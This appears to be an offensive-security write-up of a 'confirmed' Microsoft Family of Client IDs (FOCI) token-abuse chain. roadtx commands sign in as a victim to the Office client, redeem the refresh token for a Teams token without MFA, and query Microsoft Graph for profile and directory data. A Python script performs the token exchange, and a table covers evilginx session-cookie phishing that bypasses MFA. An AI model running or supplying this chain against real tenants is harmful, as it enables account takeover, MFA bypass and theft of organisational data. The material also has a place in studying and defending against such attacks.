FOCI Token Chain
Family of Client IDs — confirmed S40 — MS Office token to Teams to Graph API 200
What FOCI Is
Microsoft's Family of Client IDs (FOCI) is a set of first-party Microsoft client applications (Office, Teams, Outlook, Azure CLI and others) that share refresh tokens: a refresh token issued to one client in the family can be redeemed at the token endpoint, with an ordinary refresh_token grant, for an access token and a fresh refresh token belonging to any other client in the family, for any resource that client is allowed to request. The authentication claims of the original sign-in (including the MFA claim) are carried over, so the redemption involves no re-authentication, no MFA prompt and no user notification. Only Microsoft's own first-party clients are family members; a refresh token issued to a third-party app cannot be redeemed this way.
Confirmed Chain
```bash
# 1. Authenticate as the victim against the Microsoft Office client ID
#    (-u/-p shown as placeholders; any sign-in method roadtx supports works).
#    roadtx writes the resulting access and refresh tokens to .roadtools_auth.
roadtx auth -u USER -p PASSWORD -c d3590ed6-52b3-4102-aeff-aad2292ab01c -r https://graph.microsoft.com

# 2. Redeem the Office refresh token (TOKEN = refresh_token from .roadtools_auth)
#    for a Microsoft Teams access token. No MFA prompt: Teams is in the same family.
#    (roadtx gettokens is an alias of roadtx auth.)
roadtx gettokens --refresh-token TOKEN -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 -r https://graph.microsoft.com

# 3. Use the Teams-issued access token against Graph
curl -H "Authorization: Bearer ACCESS_TOKEN" https://graph.microsoft.com/v1.0/me
# Returns 200 with the victim's profile; the same token reaches org, tenant
# and directory data (user enumeration via /v1.0/users).
```
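The exchange that roadtx performs in step 2 is a plain OAuth2 refresh_token grant in which the client_id differs from the one the refresh token was issued to. The Python below is an added example (not roadtools code and not from the original page) that builds that request, and decodes the resulting access token to show which family client it is bound to and that the MFA claim (`amr` contains `mfa`) was inherited. The first two client IDs are the ones used on this page; the Azure CLI and Azure PowerShell IDs are assumed here from public FOCI listings. The sample token is constructed and unsigned so the block runs offline; `redeem()` is the only function that talks to the network and is never called automatically.

```python
"""FOCI refresh-token exchange and token inspection (added example)."""
import base64
import json
import urllib.parse
import urllib.request

# First-party client IDs. Office and Teams are the ones used in the chain
# above; Azure CLI / Azure PowerShell are assumed from public FOCI lists.
FOCI_CLIENTS = {
    "d3590ed6-52b3-4102-aeff-aad2292ab01c": "Microsoft Office",
    "1fec8e78-bce4-4aaf-ab1b-5451cc387264": "Microsoft Teams",
    "04b07795-8ddb-461a-bbee-02f9e1bf7b46": "Microsoft Azure CLI",
    "1950a258-227b-4e31-a9cf-717495945fc2": "Microsoft Azure PowerShell",
}

# v1 token endpoint (resource-based), the same flow roadtx uses with -r.
TOKEN_ENDPOINT = "https://login.microsoftonline.com/common/oauth2/token"


def is_foci_client(client_id):
    """True if client_id is in the (local, partial) family list."""
    return client_id in FOCI_CLIENTS


def build_foci_exchange(refresh_token, target_client_id, resource):
    """Return (url, form) for redeeming a family refresh token.

    Standard refresh_token grant; FOCI is what lets the token server accept
    a client_id other than the one the refresh token was originally issued to.
    """
    if not is_foci_client(target_client_id):
        raise ValueError(f"{target_client_id} is not a known FOCI client")
    form = {
        "grant_type": "refresh_token",
        "client_id": target_client_id,
        "refresh_token": refresh_token,
        "resource": resource,
    }
    return TOKEN_ENDPOINT, form


def redeem(refresh_token, target_client_id, resource):
    """Perform the exchange online and return the token response as a dict."""
    url, form = build_foci_exchange(refresh_token, target_client_id, resource)
    data = urllib.parse.urlencode(form).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read())


def _b64url_decode(segment):
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(obj):
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def decode_claims(jwt):
    """Decode a JWT payload WITHOUT verifying the signature.

    Inspection only (appid, aud, amr); never use this to trust a token.
    """
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    return json.loads(_b64url_decode(parts[1]))


def describe_token(access_token):
    """Summarise which family client a v1 access token is bound to and
    whether the MFA claim from the original sign-in was inherited."""
    claims = decode_claims(access_token)
    return {
        "client": FOCI_CLIENTS.get(claims.get("appid"), "unknown"),
        "audience": claims.get("aud"),
        "mfa_inherited": "mfa" in claims.get("amr", []),
    }


def make_sample_jwt(claims):
    """Constructed, unsigned JWT (alg=none) for offline demonstration."""
    return f"{_b64url_encode({'alg': 'none', 'typ': 'JWT'})}.{_b64url_encode(claims)}."


# Constructed sample of a Teams-bound Graph token obtained via FOCI from
# an MFA-backed Office sign-in. Not a real token.
SAMPLE_ACCESS_TOKEN = make_sample_jwt({
    "aud": "https://graph.microsoft.com",
    "appid": "1fec8e78-bce4-4aaf-ab1b-5451cc387264",
    "amr": ["pwd", "mfa"],
    "upn": "victim@example.com",
})

if __name__ == "__main__":
    url, form = build_foci_exchange(
        "REFRESH_TOKEN", "1fec8e78-bce4-4aaf-ab1b-5451cc387264",
        "https://graph.microsoft.com")
    print(url, form)
    print(describe_token(SAMPLE_ACCESS_TOKEN))
```

To run the chain for real, feed the refresh_token from .roadtools_auth into `redeem()` and pass the returned access_token to `describe_token()`; the `appid` claim will show the Teams client ID even though the user only ever signed in to Office, and `amr` will still list `mfa`.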
Three Attack Layers
| Layer | Condition | What happens |
|---|---|---|
| 1 | No Conditional Access policy requiring MFA | evilginx proxies the sign-in and the password alone yields a full session; MFA is never demanded, so it never fires |
| 2 | MFA enforced by Conditional Access | evilginx proxies the real sign-in and captures the session cookie after the user completes MFA; the captured session carries the MFA claim, so the attacker holds proof of MFA they never performed |
| 3 | Any captured session | The session is turned into a refresh token for a family client, and FOCI extends it to every other family client, including apps the victim never used |

Caveat: Conditional Access is re-evaluated every time a refresh token is redeemed, so controls that key on something the attacker's redemption does not present (compliant or hybrid-joined device, trusted location) can still block layers 2 and 3. MFA on its own cannot, because the MFA claim is exactly what the captured session already carries.
One Truth
The lock does not protect the room if you can wait at the door and take the key from whoever just unlocked it.